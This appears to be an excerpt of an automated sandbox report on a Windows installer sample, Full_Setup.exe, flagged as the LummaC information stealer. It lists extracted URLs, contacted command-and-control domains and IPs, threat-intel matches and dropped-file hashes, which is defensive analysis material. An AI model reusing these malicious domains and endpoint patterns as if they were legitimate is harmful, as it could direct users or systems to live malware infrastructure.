https://certs.securetrust.com/CA0	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autohotkey.comCould	BrightLib.exe, 00000024.00000002.2526451189.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000000.2482040175.000000000049A000.00000002.00000001.01000000.0000000E.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.1962949630.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.certum.pl/CPS0	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
http://www.innosetup.com/	Full_Setup.exe	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000004.00000002.1962949630.00000000050B5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://michaeluno.jp/4	BrightLib.exe, 00000024.00000002.2527811100.0000000003290000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.1962949630.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.1962949630.00000000050B5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.certum.pl/ctnca.crl0k	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.1962949630.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000004.00000002.1962949630.00000000054CE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aloofysofar.click/$$	Full_Setup.exe, 00000000.00000003.1831906551.0000000003687000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1831536852.0000000003686000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.1971200584.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autohotkey.com	BrightLib.exe, 00000024.00000002.2526451189.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000000.2482040175.000000000049A000.00000002.00000001.01000000.0000000E.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Full_Setup.exe, 00000000.00000003.1793159948.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792888136.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1804469987.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792981516.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1804628279.00000000036C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://certificates.starfieldtech.com/repository/1604	Full_Setup.exe	false		high
https://www.ecosia.org/newtab/	Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	Full_Setup.exe	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Full_Setup.exe, 00000000.00000003.1820248107.0000000003796000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.1962949630.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipvumisui.shop/	Full_Setup.exe, Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.0000000000915000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aloofysofar.click:443/apiA	Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.000000000090D000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1897734559.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	Full_Setup.exe	false		high
https://support.microsof	Full_Setup.exe, 00000000.00000003.1792888136.00000000036CF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.1962949630.00000000050B5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.info-zip.org/	BrightLib.exe, 00000024.00000002.2549688545.0000000039F54000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.securetrust.com/0?	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Full_Setup.exe, 00000000.00000003.1792981516.00000000036A3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop:443/8574262446/ph.txt	Full_Setup.exe	false	Avira URL Cloud: malware	unknown
http://repository.certum.pl/cscasha2.cer0	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
http://ocsp.sectigo.com0	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
http://ocsp.vikingcloud.com/0A	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aloofysofar.click/h	Full_Setup.exe, 00000000.00000003.1897734559.0000000000914000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certs.securetrust.com/issuers/TWGCA.crt0	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.vikingcloud.com/0:	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000004.00000002.1971200584.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dfgh.online/invoker.php?compName=	powershell.exe, 00000004.00000002.1961151737.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Full_Setup.exe, 00000000.00000003.1793159948.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792888136.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1804469987.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792981516.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1804628279.00000000036C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.micros	powershell.exe, 00000004.00000002.1962949630.0000000005280000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	Full_Setup.exe	false		high
http://x1.c.lencr.org/0	Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/Sectig	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Full_Setup.exe, 00000000.00000003.1792981516.00000000036A3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://subca.ocsp-certum.com01	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
https://contoso.com/	powershell.exe, 00000004.00000002.1971200584.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0D	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
https://dfgh.online	powershell.exe, 00000004.00000002.1962949630.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jrsoftware.org0	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
https://jrsoftware.org/	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
http://crl.starfieldtech.com/repository/sfsroot.crl0P	Full_Setup.exe	false		high
https://support.mozilla.org/products/firefoxgro.all	Full_Setup.exe, 00000000.00000003.1820248107.0000000003796000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.trustwave.com/TWGCA.crl0n	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.1971200584.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://repository.certum.pl/ctnca.cer09	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/TWGCSCA_L1.crl0y	Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	Full_Setup.exe	false		high
https://www.certum.pl/CPS0	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
https://aloofysofar.click:443/api	Full_Setup.exe, Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.000000000090D000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1897734559.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.certum.pl/cscasha2.crl0q	8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
http://cscasha2.ocsp-certum.com04	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
https://ac.ecosia.org/autocomplete?q=	Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	false		high
http://crl.starfieldtech.com/repository/0	Full_Setup.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.37.128	klipvumisui.shop	United States	13335	CLOUDFLARENETUS	false
185.161.251.21	cegu.shop	United Kingdom	5089	NTLGB	false
172.67.196.191	aloofysofar.click	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584499
Start date and time:	2025-01-05 17:47:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Full_Setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@59/15@4/3
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target BrightLib.exe, PID 2024 because there are no executed function
Execution Graph export aborted for target Full_Setup.exe, PID 7048 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 6524 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:48:11	API Interceptor	11x Sleep call for process: Full_Setup.exe modified
11:48:27	API Interceptor	17x Sleep call for process: powershell.exe modified
11:49:22	API Interceptor	1x Sleep call for process: BrightLib.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.37.128	Setup.exe	Get hash	malicious	LummaC	Browse
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	re5.mp4.hta	Get hash	malicious	LummaC	Browse
	Active_Setup.exe	Get hash	malicious	LummaC	Browse
	Set-up.exe	Get hash	malicious	LummaC	Browse
	#Setup.exe	Get hash	malicious	LummaC	Browse
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
185.161.251.21	Setup.exe	Get hash	malicious	LummaC	Browse
	SET_UP.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Active_Setup.exe	Get hash	malicious	LummaC	Browse
	Poket.mp4.hta	Get hash	malicious	LummaC	Browse
	setup.exe	Get hash	malicious	LummaC	Browse
	Active_Setup.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cegu.shop	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	SET_UP.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Poket.mp4.hta	Get hash	malicious	LummaC	Browse	185.161.251.21
	setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
klipvumisui.shop	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.37.128
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.128
	re5.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.37.128
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.37.128
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.37.128
	#Setup.exe	Get hash	malicious	LummaC	Browse	104.21.37.128
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.128
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	172.67.208.58

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	momo.spc.elf	Get hash	malicious	Mirai	Browse	1.1.1.1
	momo.ppc.elf	Get hash	malicious	Mirai	Browse	1.1.1.1
	momo.sh4.elf	Get hash	malicious	Mirai	Browse	1.1.1.1
	momo.x86.elf	Get hash	malicious	Mirai	Browse	1.1.1.1
	momo.m68k.elf	Get hash	malicious	Mirai	Browse	1.1.1.1
	z0r0.sh4.elf	Get hash	malicious	Mirai	Browse	172.71.176.132
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	avaydna.exe	Get hash	malicious	Njrat	Browse	104.17.25.14
	HateSpeech2024_Summary.pdf.lnk.bin.lnk	Get hash	malicious	Emmenhtal Loader, MalLnk	Browse	104.21.2.79
	paint.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
NTLGB	momo.mips.elf	Get hash	malicious	Mirai	Browse	82.18.222.135
	momo.arm.elf	Get hash	malicious	Mirai	Browse	82.17.192.171
	momo.mpsl.elf	Get hash	malicious	Mirai	Browse	82.128.104.220
	momo.arm7.elf	Get hash	malicious	Mirai	Browse	86.15.30.49
	z0r0.m68k.elf	Get hash	malicious	Mirai	Browse	86.17.1.179
	z0r0.x86.elf	Get hash	malicious	Mirai	Browse	81.99.50.70
	z0r0.sh4.elf	Get hash	malicious	Mirai	Browse	81.103.250.108
	z0r0.i686.elf	Get hash	malicious	Mirai	Browse	82.2.230.58
	armv4l.elf	Get hash	malicious	Unknown	Browse	82.38.39.22
	armv5l.elf	Get hash	malicious	Unknown	Browse	81.105.243.86
CLOUDFLARENETUS	momo.spc.elf	Get hash	malicious	Mirai	Browse	1.1.1.1
	momo.ppc.elf	Get hash	malicious	Mirai	Browse	1.1.1.1
	momo.sh4.elf	Get hash	malicious	Mirai	Browse	1.1.1.1
	momo.x86.elf	Get hash	malicious	Mirai	Browse	1.1.1.1
	momo.m68k.elf	Get hash	malicious	Mirai	Browse	1.1.1.1
	z0r0.sh4.elf	Get hash	malicious	Mirai	Browse	172.71.176.132
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	avaydna.exe	Get hash	malicious	Njrat	Browse	104.17.25.14
	HateSpeech2024_Summary.pdf.lnk.bin.lnk	Get hash	malicious	Emmenhtal Loader, MalLnk	Browse	104.21.2.79
	paint.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	K27Yg4V48M.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 172.67.196.191 185.161.251.21
	IH5XqCdf06.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 172.67.196.191 185.161.251.21
	3jL3mqtjCn.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 172.67.196.191 185.161.251.21
	file.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.37.128 172.67.196.191 185.161.251.21
	J18zxRjOes.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 172.67.196.191 185.161.251.21
	ZxSWvC0Tz7.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 172.67.196.191 185.161.251.21
	SOElePqvtf.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 172.67.196.191 185.161.251.21
	m4lz5aeAiN.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 172.67.196.191 185.161.251.21
	ehD7zv3l4U.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 172.67.196.191 185.161.251.21
	rdFy6abQ61.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 172.67.196.191 185.161.251.21

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe	Setup.exe	Get hash	malicious	LummaC	Browse
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	setup.exe	Get hash	malicious	LummaC	Browse
	Set-up.exe	Get hash	malicious	LummaC	Browse
	#Setup.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Temp\is-2DAON.tmp\_isetup\_isdecmp.dll	Setup.exe	Get hash	malicious	LummaC	Browse
	qnUFsmyxMm.exe	Get hash	malicious	LummaC	Browse
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	setup.exe	Get hash	malicious	LummaC	Browse
	Set-up.exe	Get hash	malicious	LummaC	Browse
	#Setup.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllul9kLZ:NllUG
MD5:	087D847469EB88D02E57100D76A2E8E4
SHA1:	A2B15CEC90C75870FDAE3FEFD9878DD172319474
SHA-256:	81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
